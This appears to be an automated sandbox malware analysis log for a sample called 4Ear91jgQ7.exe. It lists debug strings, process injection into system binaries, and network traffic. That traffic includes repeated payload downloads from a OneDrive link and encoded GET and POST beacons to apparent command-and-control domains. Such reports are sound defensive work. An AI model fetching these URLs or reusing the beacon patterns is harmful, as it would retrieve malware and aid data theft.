            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: 4Ear91jgQ7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: sers\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbllu# source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uu.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Elaniabdv.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: oC:\Users\user\Documents\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdbbq source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb[ source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb37-8B11-F424491E3931}\Servererver32mmon Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3320587311.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3320993994.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: C:\Windows\Elaniabdv.pdbpdbbdv.pdbdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb7 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: findstr.pdbGCTL source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb.> source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: Microsoft.CSharp.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: n4C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: o.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: symbols\pif\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.0000000001372000.00000004.00000020.00020000.00000000.sdmp, WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Drawing.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Users\user\Documents\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb source: 4Ear91jgQ7.exe, 4Ear91jgQ7.pif.pif.pif.pif.pif.67.dr, 4Ear91jgQ7.pif.pif.pif.32.dr, 4Ear91jgQ7.pif.pif.pif.pif.pif.pif.74.dr, 4Ear91jgQ7.pif.pif.13.dr, 4Ear91jgQ7.pif.pif.pif.pif.48.dr, 4Ear91jgQ7.pif.5.dr
            Source: Binary string: System.Core.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.pdbMZ source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbts\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
            Source: Joe Sandbox ViewIP Address: 43.155.26.241 43.155.26.241
            Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /c7rq/?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /kwl6/?3F=ZLtxCXoX&oBG=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
            Source: global trafficDNS traffic detected: DNS query: cdsf1g.db.files.1drv.com
            Source: global trafficDNS traffic detected: DNS query: www.gospelstudygroup.org
            Source: global trafficDNS traffic detected: DNS query: www.valerieomage.com
            Source: global trafficDNS traffic detected: DNS query: www.instantmailer.cloud
            Source: global trafficDNS traffic detected: DNS query: www.kosherphonestore.com
            Source: global trafficDNS traffic detected: DNS query: www.cwgehkk.store
            Source: unknownHTTP traffic detected: POST /ktbm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.kosherphonestore.comOrigin: http://www.kosherphonestore.comReferer: http://www.kosherphonestore.com/ktbm/Content-Length: 204Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53Data Raw: 6f 42 47 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d Data Ascii: oBG=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3345359746.00000000057F9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cwgehkk.store
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3345359746.00000000057F9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cwgehkk.store/kwl6/
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003381000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002470000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4m4LKvhJ_pTnz9rawaJjs2KZErvU8neZdJYfN9Hc3hkDV_oDM8LwyhXl_csc1M6IVr
            Source: 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4m55yNyrfmR788IlgrTwCE-wIZNwJTU2JVOtkkPb1qgGdeCZ2PORv3tzG8rnttZ1cB
            Source: 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mE8p9HhoIpPnY2ZSkO-k2QoyiDP1eEVixXoeiZO3gSa-GRM46_Yn-B7ipY2YArCUE
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mP83fG79GWrLdMGamez0hrTjn2wKcdfccPJocaqFvFmy0YwM8XhejQeyEmWBqIIPJ
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mTVGq-8d-NYEWVY690_WG8M-flr_PfcRMpSRv1BSgDK_Xdu7-xjZQd9se4iAmRZer
            Source: 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mUBDVxFL0Km4dF6fb4nRGW7ZdjXIi96DMwMDKod96AJlGSBshmayLs2aYjkMajC8m
            Source: 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mUzOlIfy49nah4fKlzCWhYlTPZUFu9vAgDNS-S_X2t_nL0Y-9XGqjLW3kaagbac6F
            Source: 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mfqQtLozj-9TM6Ba0WtMrYNaZZLYdZifHt7JSgEAwVuBfWo_gNuWKsrXMDkmnGIRA
            Source: 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mmRCyddZd8TgumTkc0WgJGPW0Be2KAP8RA1AGW9Yg-qGmwy0u0VLZAuymVEdH6LS2
            Source: 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mo4p-JVtoRBSqHrQiA9KeG1S6nMOtlwjW-1eDspeJcYnm3M5qDvMNKDA9M8fz9FBK
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mxEYTjyjp5LfgrlSoxPuo-qFG-8J5AXctRyKSa4F8HTVl2y0jju6xUKiA_toKgQU3
